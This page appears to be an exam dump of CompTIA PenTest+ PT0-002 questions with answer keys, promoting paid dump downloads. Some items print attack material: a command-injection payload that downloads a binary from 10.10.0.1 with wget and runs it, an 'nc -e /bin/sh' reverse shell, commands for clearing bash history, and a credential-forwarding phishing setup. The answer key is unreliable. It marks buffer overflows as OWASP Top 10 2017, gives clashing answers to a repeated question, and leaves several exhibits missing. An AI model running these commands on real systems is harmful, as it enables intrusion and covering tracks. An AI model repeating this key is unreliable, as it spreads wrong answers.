New 2024 Realistic PT0-002 Dumps Test Engine Exam Questions in here
Updated Official licence for PT0-002 Certified by PT0-002 Dumps PDF
NEW QUESTION # 127
A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
- A. To ensure someone is available if something goes wrong
- B. Because of concerns regarding bandwidth limitations
- C. For testing of the customer's SLA with the ISP
- D. To meet PCI DSS testing requirements
Answer: A
NEW QUESTION # 128
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Disable or upgrade SSH daemon.
- B. Implement a better method for authentication.
- C. Eliminate network management and control interfaces.
- D. Enforce enhanced password complexity requirements.
- E. Disable HTTP/301 redirect configuration.
- F. Create an out-of-band network for management.
Answer: E,F
NEW QUESTION # 129
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
- A. Maximizing the likelihood of finding vulnerabilities
- B. Eliminating the potential for false positives
- C. Reducing the risk to the client environment
- D. Reprioritizing the goals/objectives
Answer: D
Explanation:
Explanation
Goal Reprioritization Have the goals of the assessment changed? Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization.
NEW QUESTION # 130
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 131
A penetration tester gains access to a system and is able to migrate to a user process:
Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
- A. Adding an additional IP address on the compromised system
- B. Redirecting output from a file to a remote system
- C. Setting up a reverse shell from a remote system
- D. Executing a file on the remote system
- E. Creating a new process on all domain systems
- F. Mapping a share to a remote system
- G. Building a scheduled task for execution
Answer: D,F
Explanation:
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.
NEW QUESTION # 132
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
- A. grep -v apache ~/.bash_history > ~/.bash_history
- B. taskkill /IM "apache" /F
- C. rm -rf /tmp/apache
- D. chmod 600 /tmp/apache
Answer: C
NEW QUESTION # 133
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
- A. Move laterally to create a user account on LDAP
- B. Obtain /etc/shadow and brute force the root password.
- C. Create a one-shot system service to establish a reverse shell.
- D. Run the nc -e /bin/sh <...> command.
Answer: C
Explanation:
Explanation
https://hosakacorp.net/p/systemd-user.html
NEW QUESTION # 134
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
- A. Create a one-shot systemd service to establish a reverse shell.
- B. Move laterally to create a user account on LDAP
- C. Run the nc -e /bin/sh <...> command.
- D. Obtain /etc/shadow and brute force the root password.
Answer: C
NEW QUESTION # 135
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Open-source research
- B. Traffic sniffing
- C. A vulnerability scan
- D. A ping sweep
- E. Port knocking
- F. An Nmap scan
Answer: A,B
NEW QUESTION # 136
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to
https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:
Which of the following lines of code should the security engineer add to make the attack successful?
- A. crossDomain: true
- B. window.location.= 'https://evilcorp.com'
- C. redirectUrl = 'https://example.com'
- D. geturlparameter ('username')
Answer: A
NEW QUESTION # 137
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
- A. Redirecting Bash history to /dev/null
- B. Making a copy of the user's Bash history for further enumeration
- C. Covering tracks by clearing the Bash history
- D. Making decoy files on the system to confuse incident responders
Answer: C
NEW QUESTION # 138
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previous exploited system, which fails:
Which of the following explains the reason why the command failed?
- A. An account for RDP does not exist on the server.
- B. PowerShell requires administrative privilege.
- C. The tester input the incorrect IP address.
- D. The command requires the -port 135 option.
Answer: A
NEW QUESTION # 139
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A. Code context for instances of unsafe type-casting operations
- B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C. Executive summary of the penetration-testing methods used
- D. Quantitative impact assessments given a successful software compromise
Answer: A
Explanation:
Explanation
Code context for instances of unsafe type-casting operations would most likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience, as it would provide relevant and actionable information for the developers to fix the vulnerabilities.
Type-casting is the process of converting one data type to another, such as an integer to a string. Unsafe type-casting can lead to errors, crashes, or security issues, such as buffer overflows or code injection.
NEW QUESTION # 140
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
- A. Ransomware attacks
- B. Buffer overflows
- C. Zero-day attacks
- D. Injection flaws
- E. Race-condition attacks
- F. Cross-site scripting
Answer: B,F
NEW QUESTION # 141
A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
- A. Windows Server
- B. Arch Linux
- C. CentOS
- D. Ubuntu
Answer: A
NEW QUESTION # 142
......
Grab latest CompTIA PT0-002 Dumps as PDF Updated: https://www.passtorrent.com/PT0-002-latest-torrent.html
Newly Released PT0-002 Dumps for CompTIA PenTest+ Certified: https://drive.google.com/open?id=18D1sb_-It6_U034gOa0P8MC3QgmZYFn4